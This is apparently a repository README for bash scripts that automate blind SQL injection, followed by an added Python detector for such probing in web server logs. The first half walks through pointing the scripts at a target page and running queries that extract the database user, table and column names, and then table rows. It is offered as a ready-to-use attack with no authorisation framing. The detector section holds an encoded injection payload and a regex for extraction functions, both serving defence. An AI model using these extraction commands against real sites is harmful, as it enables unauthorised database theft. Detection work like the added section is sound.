
Script-for-exploiting-Blind-SQL-injection

These are bash scripts made for automating the exploitation of Blind SQL Injection vulnerabilities.

HIGHLY RECOMMENDED: FIRST RUN THE QUERY "@@version" TO SEE WHICH DATABASE VERSION IS IN USE, SO THAT YOU SEND THE APPROPRIATE QUERIES.

FOR blindSQLi.sh:

CHANGE THE URL on the 5th line to the one you want to use.

CHANGE THE ?band=the offspring' on the 20th line to "?<vulnerable parameter>=<value>' ".

CHANGE THE truestring variable to the string you obtain in the response when a normal (true) query succeeds.

Examples of use with MySQL queries:

bash blindSQLi.sh 20 "Select user()" #show the current database user
bash blindSQLi.sh 20 "Select database()" #show the current database

bash blindSQLi.sh 20 "SELECT table_name FROM information_schema.tables WHERE table_schema='DATABASEname' limit 0,1 " #show the 1st table name of a database
bash blindSQLi.sh 20 "SELECT table_name FROM information_schema.tables WHERE table_schema='DATABASEname' limit 1,1 " #show the 2nd table name of a database, and so on...

bash blindSQLi.sh 20 "SELECT column_name FROM information_schema.columns WHERE table_name='TABLEname' limit 0,1 " #show the 1st column name of a table
bash blindSQLi.sh 20 "SELECT column_name FROM information_schema.columns WHERE table_name='TABLEname' limit 1,1 " #show the 2nd column name of a table, and so on...

bash blindSQLi.sh 30 "SELECT concat(COLUMN1, '---', COLUMN2) FROM TABLEname limit 0,1 " #extract the 1st row of 2 columns from a table
bash blindSQLi.sh 30 "SELECT concat(COLUMN1, '---', COLUMN2, '---', COLUMN3) FROM TABLEname limit 1,1 " #extract the 2nd row of 3 columns from a table, and so on...

Where 20 is the maximum number of characters we expect in the response, and what's inside the quotes is the query you want to run.

You can use a query cheatsheet like the ones that are in the PentestMonkey webpage.

FOR blind.sh:

-u, --url              The URL to query, e.g.: http://webpage.com/banddetails.php
-i, --id               The ID parameter to use in the URL, e.g.: ?band=20
-t, --truestring       The response that the web application shows when a request is successful, e.g.: We worked with them in the past
-m, --maxlength        The maximum length of the substring to extract, e.g.: 20
-q, --query            The SQL query to extract the substring from, see the PentestMonkey SQL injection cheatsheets
-h, --help             Show this help panel

EXAMPLE OF USE FOR blind.sh

./blind.sh -u http://webpage.com/banddetails.php -i "?band=20" -t "We worked with them in the past" -m 30 -q "Select user()"
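Seen from the server side, a script like this sends one request per candidate character and keeps the one that returns the truestring, so the access log fills with bursts of near-identical requests to one page that differ only in the probed position or character. The following detector is an added example, not part of this repository: it runs over constructed Apache-style log lines (the IPs, timestamps and paths are assumptions) and flags any client that repeatedly hits the same path with quote-plus-substring()/ascii() style payloads.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed sample, not real traffic: Apache combined-style access log lines.
# 203.0.113.7 behaves like an automated boolean-based extractor, probing the
# same parameter of the same page over and over; 198.51.100.2 browses normally.
PROBE = "20%27+AND+substring%28%28Select+user%28%29%29%2C1%2C1%29%3D%27{}%27--+-"
SAMPLE_LOG = "\n".join(
    [f'203.0.113.7 - - [10/Mar/2024:12:00:0{i} +0000] "GET /banddetails.php?band='
     f'{PROBE.format(c)} HTTP/1.1" 200 5120' for i, c in enumerate("abcdef")]
    + ['198.51.100.2 - - [10/Mar/2024:12:00:07 +0000] "GET /banddetails.php?band=20 HTTP/1.1" 200 5120',
       '198.51.100.2 - - [10/Mar/2024:12:00:09 +0000] "GET /index.php HTTP/1.1" 200 2048'])

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Functions that character-by-character extraction leans on (MySQL spelling; extend for other DBs).
PROBE_RE = re.compile(r"\b(substring|substr|mid|ascii|ord)\s*\(", re.IGNORECASE)

def parse_line(line):
    """Return (ip, path, decoded query string), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return m.group("ip"), parts.path, unquote_plus(parts.query)

def is_probe(query):
    """True when a decoded query string carries a quote plus a substring/ascii-style call."""
    return "'" in query and PROBE_RE.search(query) is not None

def find_blind_sqli(log_text, threshold=5):
    """Count probe requests per (ip, path) and report the pairs at or above threshold."""
    hits = Counter()
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed and is_probe(parsed[2]):
            hits[(parsed[0], parsed[1])] += 1
    return {key: n for key, n in hits.items() if n >= threshold}

if __name__ == "__main__":
    for (ip, path), n in find_blind_sqli(SAMPLE_LOG).items():
        print(f"{ip} sent {n} blind-SQLi style probes to {path}")
```

On real logs, lower the threshold or add a time window per (ip, path) pair, and pair this with the response-size signal: true and false probes typically return two distinct, repeating sizes.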
